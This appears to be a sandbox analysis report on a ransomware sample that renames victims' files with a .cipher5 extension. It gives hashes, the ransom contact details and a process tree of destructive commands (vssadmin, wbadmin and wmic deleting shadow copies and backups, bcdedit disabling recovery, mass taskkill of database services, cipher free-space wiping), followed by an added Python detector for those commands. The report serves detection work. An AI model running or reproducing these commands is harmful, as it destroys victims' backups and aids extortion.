Analysis
max time kernel: 148s
max time network: 181s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 29-11-2022 11:01
Static task: static1
Behavioral task: behavioral1 (Sample: 64new_cip5.exe, Resource: win7-20220812-en)
Behavioral task: behavioral2 (Sample: 64new_cip5.exe, Resource: win10v2004-20220812-en)
General
Target: 64new_cip5.exe
Size: 309KB
MD5: f1a3a57b1e469f0ecb2674bc8e2ed1f5
SHA1: 8b51223c1d124a9db8102a510bf469a77682fc3b
SHA256: 70cd735412950a78b1341edc421441ffc07bd174fbdc42284961346c3cfe213e
SHA512: 20eda5f143e5e5ae7e7652e7f024ab01be47e747408afa8e7f9036a9829e5ce35575c67ae15ff229aad09f25be728ba6ff72dc5b73b74deb570cb12205451a16
SSDEEP: 6144:vPLavV9JccWJzcwYuUxhCKrSjZ5pjedRYc4ihyYr+3l0L3WtCyaw7c:v+vV9CZMuUxhC6SjZfjeu++3raw7c
Malware Config
Extracted from \??\A:\!-Recovery_Instructions-!.html (ransom note):
- contact e-mail: Mikesupp77@outlook.com
- messenger download link: https://tox.chat/download.html
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
- description: PID 4308 created 2560; pid 4308, process 64new_cip5.exe, target process Explorer.EXE (the sample created a process whose parent was set to Explorer.EXE rather than itself, i.e. parent-PID spoofing; the second 64new_cip5.exe instance in the process tree below appears under Explorer.EXE for this reason)
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
- 4636 bcdedit.exe
- 1244 bcdedit.exe
Deletes System State backups 2 IoCs (heading missing from the extracted page; restored from the process tree below, which tags two System State deletions and one backup deletion)
Processes:
- 4536 wbadmin.exe
- 1056 wbadmin.exe
Deletes system backups 1 IoCs
Processes:
- 1288 wbadmin.exe
Modifies Installed Components in the registry 2 TTPs 1 IoCs
Processes:
- Key created: \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Active Setup\Installed Components (explorer.exe)
Modifies extensions of user files 6 IoCs
Ransomware generally changes the extension on encrypted files.
Processes (all by 64new_cip5.exe):
- File renamed C:\Users\Admin\Pictures\GroupResolve.png => C:\Users\Admin\Pictures\GroupResolve.png.cipher5
- File renamed C:\Users\Admin\Pictures\HideApprove.png => C:\Users\Admin\Pictures\HideApprove.png.cipher5
- File renamed C:\Users\Admin\Pictures\LockBackup.raw => C:\Users\Admin\Pictures\LockBackup.raw.cipher5
- File renamed C:\Users\Admin\Pictures\LockInitialize.png => C:\Users\Admin\Pictures\LockInitialize.png.cipher5
- File opened for modification C:\Users\Admin\Pictures\SendSync.tiff
- File renamed C:\Users\Admin\Pictures\SendSync.tiff => C:\Users\Admin\Pictures\SendSync.tiff.cipher5
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
- 64new_cip5.exe opened (read-only), in this order: \??\N:, \??\T:, \??\V:, \??\A:, \??\G:, \??\I:, \??\K:, \??\M:, \??\R:, \??\S:, \??\E:, \??\F:, \??\H:, \??\O:, \??\U:, \??\W:, \??\X:, \??\Y:, \??\B:, \??\J:, \??\L:, \??\P:, \??\Q:, \??\Z:
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
- 1120 WerFault.exe, target pid 2560 (Explorer.EXE)
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
- 1372 vssadmin.exe
Kills process with taskkill 16 IoCs
Processes:
- taskkill.exe PIDs: 928, 4060, 528, 4408, 5076, 64, 2676, 5116, 388, 3008, 4928, 5104, 680, 3456, 1524, 3664
Modifies registry class 2 IoCs
Processes (both by explorer.exe):
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\
- Key created: \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2629973501-4017243118-3254762364-1000\{FC0D7F1C-4A64-43C6-B2E9-68D7844338B6}
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
- 64 events, all from pid 4308 64new_cip5.exe
Suspicious use of AdjustPrivilegeToken 47 IoCs
Processes:
- taskkill.exe, Token: SeDebugPrivilege, pids 4928, 5076, 64, 1524, 2676, 3664, 5104, 680, 5116, 928, 388, 4060, 3008, 528, 4408, 3456 (16 events)
- 4296 vssvc.exe, Token: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
- 3940 WMIC.exe, Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, and privileges reported only by number: 33, 34, 35, 36
- 3492 wbengine.exe, Token: SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege
- 3612 explorer.exe, Token: SeShutdownPrivilege, SeCreatePagefilePrivilege, SeShutdownPrivilege, SeCreatePagefilePrivilege
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
- 3612 explorer.exe (2 events)
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
- 3612 explorer.exe (2 events)
Suspicious use of WriteProcessMemory 64 IoCs
Processes (source pid -> target pid, with the repeat count of the write event):
- 4308 64new_cip5.exe -> 2380 cmd.exe (x3); 2380 cmd.exe -> 4208 cmd.exe (x2)
- 4308 64new_cip5.exe -> 4956 cmd.exe (x3); 4956 cmd.exe -> 4904 cmd.exe (x2); 4904 cmd.exe -> 4928 taskkill.exe (x2)
- 4308 64new_cip5.exe -> 1372 cmd.exe (x3); 1372 cmd.exe -> 384 cmd.exe (x2); 384 cmd.exe -> 5076 taskkill.exe (x2)
- 4308 64new_cip5.exe -> 4840 cmd.exe (x3); 4840 cmd.exe -> 2324 cmd.exe (x2); 2324 cmd.exe -> 64 taskkill.exe (x2)
- 4308 64new_cip5.exe -> 4240 cmd.exe (x3); 4240 cmd.exe -> 1132 cmd.exe (x2); 1132 cmd.exe -> 1524 taskkill.exe (x2)
- 4308 64new_cip5.exe -> 2492 cmd.exe (x3); 2492 cmd.exe -> 2392 cmd.exe (x2); 2392 cmd.exe -> 2676 taskkill.exe (x2)
- 4308 64new_cip5.exe -> 3560 cmd.exe (x3); 3560 cmd.exe -> 2840 cmd.exe (x2); 2840 cmd.exe -> 3664 taskkill.exe (x2)
- 4308 64new_cip5.exe -> 3572 cmd.exe (x3); 3572 cmd.exe -> 624 cmd.exe (x2); 624 cmd.exe -> 5104 taskkill.exe (x2)
- 4308 64new_cip5.exe -> 4336 cmd.exe (x3); 4336 cmd.exe -> 3312 cmd.exe (x2); 3312 cmd.exe -> 680 taskkill.exe (x2)
- 4308 64new_cip5.exe -> 920 cmd.exe (x3)
System policy modification 1 TTPs 4 IoCs
Processes (both 64new_cip5.exe instances):
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"
EnableLinkedConnections = 1 makes drive letters mapped under the user's standard (filtered) token visible to the elevated token as well, so an elevated process can reach network shares that were mapped in the unelevated session; ransomware sets it so that its encryption pass also covers mapped network drives (compare the second instance launched with the -network argument in the process tree below).
Processes
Each entry is shown as image path | command line, indented by process-tree depth; the signatures it triggered follow as bullets.

C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE
  C:\Users\Admin\AppData\Local\Temp\64new_cip5.exe | "C:\Users\Admin\AppData\Local\Temp\64new_cip5.exe"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Modifies extensions of user files
    - Enumerates connected drives
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    - System policy modification
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\taskkill.exe | taskkill -f -im sqlbrowser.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlwriter.exe
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlwriter.exe
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\taskkill.exe | taskkill -f -im sqlwriter.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\taskkill.exe | taskkill -f -im sqlservr.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\taskkill.exe | taskkill -f -im msmdsrv.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\taskkill.exe | taskkill -f -im MsDtsSrvr.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\taskkill.exe | taskkill -f -im sqlceip.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\taskkill.exe | taskkill -f -im fdlauncher.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
        - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
        C:\Windows\system32\taskkill.exe | taskkill -f -im SQLAGENT.EXE
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
        C:\Windows\system32\taskkill.exe | taskkill -f -im fdhost.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe
        C:\Windows\system32\taskkill.exe | taskkill -f -im sqlservr.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
        C:\Windows\system32\taskkill.exe | taskkill -f -im ReportingServicesService.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
        C:\Windows\system32\taskkill.exe | taskkill -f -im msftesql.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
        C:\Windows\system32\taskkill.exe | taskkill -f -im pg_ctl.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im postgres.exe
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im postgres.exe
        C:\Windows\system32\taskkill.exe | taskkill -f -im postgres.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
        C:\Windows\system32\net.exe | net stop MSSQLServerADHelper100
          C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop MSSQLServerADHelper100
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
        C:\Windows\system32\net.exe | net stop MSSQL$ISARS
          C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop MSSQL$ISARS
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
        C:\Windows\system32\net.exe | net stop MSSQL$MSFW
          C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop MSSQL$MSFW
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
        C:\Windows\system32\net.exe | net stop SQLAgent$ISARS
          C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop SQLAgent$ISARS
        C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
          C:\Windows\system32\wbadmin.exe | wbadmin DELETE SYSTEMSTATEBACKUP
            - Deletes System State backups
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
        C:\Windows\system32\net.exe | net stop SQLAgent$MSFW
          C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop SQLAgent$MSFW
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
        C:\Windows\system32\net.exe | net stop SQLBrowser
          C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop SQLBrowser
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop ReportServer$ISARS
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c net stop ReportServer$ISARS
        C:\Windows\system32\net.exe | net stop ReportServer$ISARS
          C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop ReportServer$ISARS
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
        C:\Windows\system32\net.exe | net stop SQLWriter
          C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop SQLWriter
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
        C:\Windows\system32\vssadmin.exe | vssadmin.exe Delete Shadows /All /Quiet
          - Interacts with shadow copies
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersions:0 -quiet
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersions:0 -quiet
        C:\Windows\system32\wbadmin.exe | wbadmin delete backup -keepVersions:0 -quiet
          - Deletes system backups
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
        C:\Windows\system32\wbadmin.exe | wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
          - Deletes System State backups
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
        C:\Windows\System32\Wbem\WMIC.exe | wmic.exe SHADOWCOPY /nointeractive
          - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoveryenabled No
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoveryenabled No
        C:\Windows\system32\bcdedit.exe | bcdedit.exe /set {default} recoveryenabled No
          - Modifies boot configuration data using bcdedit
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
        C:\Windows\system32\bcdedit.exe | bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
          - Modifies boot configuration data using bcdedit
    C:\Windows\SysWOW64\cipher.exe | cipher /w:\\?\C:
  C:\Users\Admin\AppData\Local\Temp\64new_cip5.exe | \\?\C:\Users\Admin\AppData\Local\Temp\64new_cip5.exe -network
    - System policy modification
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c pause
  C:\Windows\system32\WerFault.exe | C:\Windows\system32\WerFault.exe -u -p 2560 -s 3712
    - Program crash
C:\Windows\system32\taskkill.exe | taskkill -f -im Ssms.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\taskkill.exe | taskkill -f -im fdlauncher.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\WerFault.exe | C:\Windows\system32\WerFault.exe -pss -s 408 -p 2560 -ip 2560
C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\wbengine.exe | "C:\Windows\system32\wbengine.exe"
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\vdsldr.exe | C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe | C:\Windows\System32\vds.exe
C:\Windows\explorer.exe | explorer.exe
  - Modifies Installed Components in the registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
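The process tree above follows one pattern throughout: the 32-bit sample spawns a SysWOW64 cmd.exe that relaunches through %windir%\sysnative\cmd.exe (the alias that lets a WOW64 process reach the real 64-bit System32 instead of the redirected SysWOW64 copies), and only the innermost command is the one that matters: taskkill and net stop against database processes and services so their files are not locked, then vssadmin, wmic, wbadmin and bcdedit to remove shadow copies and backups and to disable boot recovery, and finally cipher /w to overwrite the free space on C: so that deleted plaintext cannot be carved back. The Python below is an added example, not part of the sandbox report or of the sample: it peels the cmd /c wrappers, classifies the inner command against rules for each of those steps, counts the WOW64-to-sysnative relaunches, and extracts the appended extension from the file-rename IoCs. The rule names, function names and the sample list are this example's own; the sample lines are transcribed from the report.

```python
"""Classify the recovery-inhibition commands seen in the process tree.
Added example for this report; the rule names are this example's own."""
from __future__ import annotations

import re
from collections import Counter
from typing import Optional, Tuple

# Constructed input: command lines transcribed from the process tree above.
SAMPLE_CMDLINES = [
    r'C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe',
    r'taskkill -f -im sqlservr.exe',
    r'C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter',
    r'C:\Windows\system32\net1 stop SQLWriter',
    r'vssadmin.exe Delete Shadows /All /Quiet',
    r'wbadmin delete backup -keepVersions:0 -quiet',
    r'wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest',
    r'wmic.exe SHADOWCOPY /nointeractive',
    r'bcdedit.exe /set {default} recoveryenabled No',
    r'bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures',
    r'cipher /w:\\?\C:',
    r'C:\Windows\system32\cmd.exe /c pause',
]

# One "<something>cmd[.exe] /c " layer at the start of a command line.
WRAPPER = re.compile(r'^\s*"?[^"\s]*cmd(?:\.exe)?"?\s+/c\s+', re.I)
# The WOW64 -> 64-bit relaunch used by every step in the tree.
WOW64_RELAUNCH = re.compile(r'\\SysWOW64\\cmd\.exe\s+/c\s+%windir%\\sysnative\\cmd\.exe', re.I)
# Sandbox "File renamed X => Y" events.
RENAME = re.compile(r'^File renamed (?P<src>.+?) => (?P<dst>.+)$')

# (technique label, pattern over the unwrapped command); group 1 is the target if any.
RULES = [
    ("shadow_copy_deletion", re.compile(r'^vssadmin(?:\.exe)?\s+delete\s+shadows\b', re.I)),
    ("shadow_copy_deletion", re.compile(r'^wmic(?:\.exe)?\s+shadowcopy\b', re.I)),
    ("backup_deletion", re.compile(r'^wbadmin(?:\.exe)?\s+delete\s+(?:backup|systemstatebackup)\b', re.I)),
    ("recovery_disabled", re.compile(
        r'^bcdedit(?:\.exe)?\s+/set\s+\{default\}\s+'
        r'(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b', re.I)),
    ("service_kill", re.compile(r'^taskkill(?:\.exe)?\s+[-/]f\s+[-/]im\s+(\S+)', re.I)),
    ("service_kill", re.compile(r'^(?:\S*\\)?net1?(?:\.exe)?\s+stop\s+(\S+)', re.I)),
    ("free_space_wipe", re.compile(r'^cipher(?:\.exe)?\s+/w:', re.I)),
]


def unwrap(cmdline: str) -> str:
    """Peel every leading `cmd /c` layer so rules see the command that finally runs."""
    prev = None
    while prev != cmdline:
        prev = cmdline
        cmdline = WRAPPER.sub('', cmdline, count=1)
    return cmdline.strip()


def classify(cmdline: str) -> Tuple[Optional[str], Optional[str]]:
    """Return (technique, target) for the innermost command, or (None, None)."""
    inner = unwrap(cmdline)
    for name, rx in RULES:
        m = rx.match(inner)
        if m:
            return name, (m.group(1) if m.groups() else None)
    return None, None


def relaunches_via_sysnative(cmdline: str) -> bool:
    return bool(WOW64_RELAUNCH.search(cmdline))


def encrypted_extension(event: str) -> Optional[str]:
    """Extension appended by a rename event, e.g. '.cipher5'; None if not an append."""
    m = RENAME.match(event)
    if m and m['dst'].startswith(m['src']):
        return m['dst'][len(m['src']):]
    return None


def summarize(cmdlines) -> dict:
    counts: Counter = Counter()
    targets = set()
    relaunches = 0
    for c in cmdlines:
        if relaunches_via_sysnative(c):
            relaunches += 1
        name, target = classify(c)
        if name:
            counts[name] += 1
            if target:
                targets.add(target)
    return {"counts": dict(counts), "targets": sorted(targets), "wow64_relaunches": relaunches}


if __name__ == "__main__":
    print(summarize(SAMPLE_CMDLINES))
```

Matching on the unwrapped command rather than the raw line is what keeps the rules short: the same vssadmin or bcdedit invocation is otherwise wrapped two levels deep, and a detection keyed on the outer SysWOW64 cmd.exe would miss the same commands launched directly, as the two stray taskkill instances at the root of the tree show.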
Downloads (memory dump artifacts, one per PID)
- memory/64-142-0x0000000000000000-mapping.dmp
- memory/384-138-0x0000000000000000-mapping.dmp
- memory/388-166-0x0000000000000000-mapping.dmp
- memory/528-175-0x0000000000000000-mapping.dmp
- memory/624-153-0x0000000000000000-mapping.dmp
- memory/648-190-0x0000000000000000-mapping.dmp
- memory/680-157-0x0000000000000000-mapping.dmp
- memory/692-194-0x0000000000000000-mapping.dmp
- memory/800-173-0x0000000000000000-mapping.dmp
- memory/920-158-0x0000000000000000-mapping.dmp
- memory/928-163-0x0000000000000000-mapping.dmp
- memory/1096-162-0x0000000000000000-mapping.dmp
- memory/1132-144-0x0000000000000000-mapping.dmp
- memory/1232-180-0x0000000000000000-mapping.dmp
- memory/1352-177-0x0000000000000000-mapping.dmp
- memory/1372-137-0x0000000000000000-mapping.dmp
- memory/1524-145-0x0000000000000000-mapping.dmp
- memory/1528-171-0x0000000000000000-mapping.dmp
- memory/1588-176-0x0000000000000000-mapping.dmp
- memory/2112-179-0x0000000000000000-mapping.dmp
- memory/2156-167-0x0000000000000000-mapping.dmp
- memory/2204-174-0x0000000000000000-mapping.dmp
- memory/2324-141-0x0000000000000000-mapping.dmp
- memory/2380-132-0x0000000000000000-mapping.dmp
- memory/2392-147-0x0000000000000000-mapping.dmp
- memory/2492-146-0x0000000000000000-mapping.dmp
- memory/2676-148-0x0000000000000000-mapping.dmp
- memory/2840-150-0x0000000000000000-mapping.dmp
- memory/2928-182-0x0000000000000000-mapping.dmp
- memory/3008-172-0x0000000000000000-mapping.dmp
- memory/3064-168-0x0000000000000000-mapping.dmp
- memory/3128-159-0x0000000000000000-mapping.dmp
- memory/3288-184-0x0000000000000000-mapping.dmp
- memory/3312-156-0x0000000000000000-mapping.dmp
- memory/3392-195-0x0000000000000000-mapping.dmp
- memory/3456-181-0x0000000000000000-mapping.dmp
- memory/3476-192-0x0000000000000000-mapping.dmp
